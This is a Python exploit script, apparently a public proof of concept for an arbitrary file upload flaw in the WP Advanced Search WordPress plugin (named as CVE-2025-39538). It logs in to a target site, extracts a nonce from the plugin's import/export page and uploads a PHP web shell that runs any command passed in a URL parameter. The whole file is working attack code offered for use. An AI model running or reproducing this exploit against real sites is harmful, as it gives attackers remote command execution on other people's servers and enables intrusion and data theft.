import requests
import argparse
from bs4 import BeautifulSoup

#By Khaled ALenazi ( Nxploited )

requests.packages.urllib3.disable_warnings()

def create_session():
    session = requests.Session()
    session.verify = False
    session.headers.update({
        "User-Agent": "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/113.0.0.0 Safari/537.36"
    })
    return session

def login(session, url, username, password):
    login_url = f"{url}/wp-login.php"
    data = {
        'log': username,
        'pwd': password,
        'rememberme': 'forever',
        'wp-submit': 'Log In'
    }
    print("[*] Attempting login...")
    response = session.post(login_url, data=data)
    if any('wordpress_logged_in' in cookie.name for cookie in session.cookies):
        print("[+] Logged in successfully.")
        return True
    else:
        print("[-] Login failed.")
        return False

def get_nonce(session, url):
    print("[*] Fetching nonce from import/export page...")
    page_url = f"{url}/wp-admin/admin.php?page=WP_Advanced_Search_Callback_ExportImport"
    response = session.get(page_url)
    if "wp_advanced_search_up_nonce" not in response.text:
        print("[-] Nonce field not found in the page.")
        return None

    soup = BeautifulSoup(response.text, 'html.parser')
    nonce_input = soup.find("input", {"name": "wp_advanced_search_up_nonce"})
    if nonce_input:
        nonce = nonce_input.get("value")
        print(f"[+] Nonce extracted: {nonce}")
        return nonce
    print("[-] Failed to extract nonce.")
    return None

def upload_shell(session, url, nonce):
    print("[*] Attempting to upload shell...")
    upload_url = f"{url}/wp-admin/admin-post.php"
    shell_code = "<?php echo shell_exec($_GET['cmd']); ?>"
    files = {
        'wp_advanced_search_file_import': ('nxploit.php', shell_code, 'application/x-php')
    }
    data = {
        'wp_advanced_search_import': 'Import',
        'wp_advanced_search_up_nonce': nonce,
        'action': 'db_import'
    }

    response = session.post(upload_url, files=files, data=data)
    if response.status_code == 200:
        print("[+] File uploaded (check wp-content/uploads or temp directory).")
    else:
        print(f"[-] Upload failed. HTTP Status: {response.status_code}")

def main():
    parser = argparse.ArgumentParser(description="CVE-2025-39538 - WP Advanced Search Arbitrary File Upload Exploit # By Nxploited (Khaled Alenazi)")
    parser.add_argument("-u", "--url", required=True, help="Target WordPress URL (e.g., http://127.0.0.1/wordpress)")
    parser.add_argument("-un", "--username", required=True, help="WordPress Username")
    parser.add_argument("-p", "--password", required=True, help="WordPress Password")
    args = parser.parse_args()

    session = create_session()
    if not login(session, args.url, args.username, args.password):
        return

    nonce = get_nonce(session, args.url)
    if not nonce:
        return

    upload_shell(session, args.url, nonce)

if __name__ == "__main__":
    main()